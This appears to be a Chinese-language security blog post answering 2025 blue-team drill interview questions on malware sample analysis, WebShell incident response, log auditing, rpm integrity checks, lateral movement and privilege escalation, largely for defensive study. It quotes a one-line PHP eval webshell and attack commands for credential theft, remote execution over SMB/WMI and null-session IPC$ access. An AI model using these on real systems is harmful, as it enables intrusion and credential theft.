安全領域各種資源，學習文檔，以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各種好玩的項目及好用的工具，歡迎關注。、

目錄

?2025年HW(護網面試) 29

1. 樣本分析思路

2. Linux GDB分析樣本示例

3. 應急案例：WebShell后門排查

4. 日志審計重點

5. 命令被替換檢測方法

6. RPM校驗參數

7. APT研究經驗

8. 常見漏洞分析方向

9. 內網漫游思路

10. 橫向移動與IPC$

11. 權限提升方法

防御建議

?2025年HW(護網面試) 29

1、如何做的樣本分析，思路是什么
2、如何用linuxgdb分析一個簡單樣本
3、再舉一個你的其他應急的例子(我舉的是挖礦病毒)
4、日志你看的是什么日志，web服務器日志嘛
5、某些命令被替換了，如何發現
6、rpm有個參數就可以校驗命令是否被替換，是什么
7、是否做過APT相關的研究
8、如何分析windows，linux，web一些常見的漏洞
9、內網突破到內網漫游的思路
10、如何橫向、IPC了解過嘛，橫向原理
11、權限提升（windows，linux）

1. 樣本分析思路

方法論框架：

mermaidgraph LR A[靜態分析] --> A1[文件格式識別] A --> A2[字符串提取] A --> A3[熵值檢測加殼] B[動態分析] --> B1[沙箱行為監控] B --> B2[API調用跟蹤] C[關聯分析] --> C1[威脅情報匹配] C --> C2[攻擊鏈重構]

關鍵步驟：

• 靜態分析：使用file、strings、binwalk識別文件結構；PEiD查殼；YARA規則掃描特征
• 動態分析：在隔離環境中運行，用Sysinternals Suite(Windows)或strace(Linux)監控進程/注冊表/網絡
• 內存取證：Volatility提取注入代碼或隱藏進程
• 逆向工程：IDA Pro/Ghidra反編譯關鍵函數

---

2. Linux GDB分析樣本示例

場景：分析ELF文件堆棧溢出漏洞

bash# 編譯時加入調試信息 gcc -g -fno-stack-protector vuln.c -o vuln # GDB調試步驟 gdb ./vuln (gdb) break main # 主函數斷點 (gdb) run < payload # 觸發漏洞 (gdb) x/100x $esp # 檢查棧內存 (gdb) info registers # 查看寄存器值 (gdb) backtrace # 崩潰調用棧 (gdb) disassemble # 反匯編當前函數

關鍵技巧：

• checksec檢查保護機制（ASLR/NX/CANARY）
• pattern create & pattern offset定位溢出點

---

3. 應急案例：WebShell后門排查

攻擊鏈：

SQL注入 → 寫入WebShell → 內網掃描 → 數據外傳  

響應過程：

1. 檢測：
   • Web日志發現/uploads/.test.php 異常訪問（HTTP 200 for POST請求）
   • 文件內容：<?php @eval($_POST['cmd']);?>
2. 遏制：
   • 隔離服務器，禁用Apache賬戶網絡權限
3. 溯源：
   • 日志關聯：攻擊IP來自TOR出口節點
   • 文件創建時間匹配此前SQL注入日志
4. 加固：
   • 目錄禁止執行權限：chmod -R o-x /var/www/uploads
   • 部署WAF規則攔截eval(等危險函數

---

4. 日志審計重點

核心日志類型：

日志類型	分析工具	關鍵事件
Web訪問日志	GoAccess/AWStats	異常路徑訪問、高頻500錯誤
系統認證日志	journalctl/rsyslog	非辦公時間登錄、root暴力破解
進程執行日志	auditd (Linux)	未知二進制執行、敏感命令調用
PowerShell日志	Windows事件4662	混淆代碼執行、遠程下載

---

5. 命令被替換檢測方法

Linux檢測步驟：

1. HASH校驗：

   bash# 查詢系統命令的原始HASH rpm -Vf /bin/ls # 輸出示例：S.5....T. /bin/ls (HASH不匹配)

2. 時間戳比對：

   basstat /bin/netstat # 查看修改時間 ls -l /bin # 對比同目錄文件時間

3. 完整性工具：
   • aide：創建數據庫定期校驗
   • tripwire：商業級文件監控

Windows檢測：

• sigcheck -v -a C:\Windows\System32\cmd.exe （Sysinternals工具）

---

6. RPM校驗參數

命令：

bashrpm -Va # 校驗所有已安裝包 rpm -Vf /usr/bin/ssh # 校驗指定命令 

輸出標識解析：

• S：文件大小改變
• 5：MD5校驗失敗
• T：修改時間變化
• U：用戶權限變更

---

7. APT研究經驗

分析重點：

• 初始入侵：魚郵件附件（CVE-2017-11882）、水坑攻擊
• 持久化：Windows計劃任務、Linux crontab
• C2通信：
  • DNS隧道（檢測異常NXDOMAIN請求）
  • HTTPS證書不匹配（JA3指紋異常）
• 數據滲出：圖片隱寫、Cloud Storage API濫用

工具鏈：

• 網絡流量：Suricata + ELK
• 端點行為：Osquery + Kolide Fleet
• 內存分析：Rekall

---

8. 常見漏洞分析方向

跨平臺漏洞矩陣：

平臺	漏洞類型	分析工具
Web	SQL注入/XSS	Burp Suite, SQLMap
Linux	內核提權(CVE-2021-4034)	checksec, lynis
Windows	永恒之藍(MS17-010)	Nessus, Impacket
云環境	桶策略錯誤	ScoutSuite, Pacu

---

9. 內網漫游思路

滲透路徑：

mermaidgraph TB A[邊界突破] --> B[主機發現] B --> C[憑證竊取] C --> D[橫向移動] D --> E[權限提升] E --> F[域控奪取]

技術細節：

• 主機發現：nmap -sn 192.168.1.0/24
• 憑證竊取：
  • Windows：Mimikatz抓取LSASS內存
  • Linux：搜索.bash_history或/etc/shadow
• 橫向移動：
  • SMB協議：psexec.py admin@192.168.1.10
  • WMI遠程執行：wmic /node:192.168.1.2 process call create "cmd.exe"

---

10. 橫向移動與IPC$

IPC$原理：

• 通過空會話（Null Session）訪問遠程主機的命名管道
• 利用方式：

  bashnet use \\192.168.1.5\IPC$ "" /u:"" # 建立空連接 enum4linux -a 192.168.1.5 # 枚舉信息 

防御措施：

• 組策略禁用匿名枚舉：RestrictAnonymous=1
• 防火墻阻斷135-139/445端口

---

11. 權限提升方法

Windows提權：

• 服務路徑漏洞：

  powershellsc qc VulnSvc # 檢查可寫服務路徑 

• 令牌竊取：incognito.exe 模擬SYSTEM令牌
• AlwaysInstallElevated：利用MSI安裝包提權

Linux提權：

• SUID濫用：

  bashfind / -perm -4000 2>/dev/null # 查找SUID文件 

• 內核漏洞：dirtypipe（CVE-2022-0847）利用腳本
• sudo配置錯誤：sudo -l 查看可免密執行命令

---

防御建議

1. Linux：定期運行rpm -Va校驗系統文件
2. Windows：啟用LSA保護防止Mimikatz
3. 日志統一：部署SIEM集中分析（如Splunk/QRadar）
4. 最小權限：所有服務使用低權賬戶運行